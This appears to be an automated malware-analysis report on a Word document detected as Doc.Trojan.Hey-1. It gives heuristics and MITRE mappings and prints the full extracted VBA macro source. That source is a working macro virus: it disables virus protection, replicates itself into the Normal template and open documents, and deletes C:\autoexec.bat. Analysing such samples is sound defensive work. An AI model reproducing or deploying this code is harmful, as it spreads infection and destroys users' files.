MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. The AutoOpen macro is present and configured to execute automatically upon opening the document. The script also contains a call to 'Kill "C:\autoexec.bat"', indicating an attempt to remove potential competing malware or clean up traces. The ClamAV detection 'Doc.Trojan.Hey-1' further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Hey-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hey-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1401 bytes |
SHA-256: ddcb954e67fdf37db679b10ddd9e323dbf7662c3402c1b562bb079f62f8d155d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modulo1" Sub AutoOpen(): Options.VirusProtection = 0 Application.Caption = "MIcroSOFT - DROW | lamp!!!?" End Sub Sub AutoNew() ©é£ã End Sub Sub ©é£ã() Set ¤ = NormalTemplate.VBProject.VBComponents(1): Set ¡ = ActiveDocument.VBProject.VBComponents(1): Set £ = ThisDocument.VBProject.VBComponents(1): If ¤.CodeModule.CountOfLines < 1 Then ¤.CodeModule.InsertLines 1, £.CodeModule.Lines(1, 40) If ¡.CodeModule.CountOfLines < 1 Then ¡.CodeModule.InsertLines 1, £.CodeModule.Lines(1, 40) End Sub Sub DateiBeenden() End Sub Sub ExtrasMakro() End Sub Sub FormatZeichen() ©é£ã End Sub Sub HilfeInfo() Kill "C:\autoexec.bat" End Sub Sub ExtrasOptionen() Application.UserName = "Zeus" Application.UserAddress = "HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA" Application.UserInitials = "Dead" Dialogs(wdDialogToolsOptions).Show End Sub Sub DateiSpeichernUnter() Dialogs(wdDialogFileSaveAs).Show (1000) End Sub Sub BearbeitenEinfügen() ©é£ã End Sub Sub BearbeitenSuchen() ©é£ã End Sub Sub AutoClose() ©é£ã MsgBox "", , "" End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.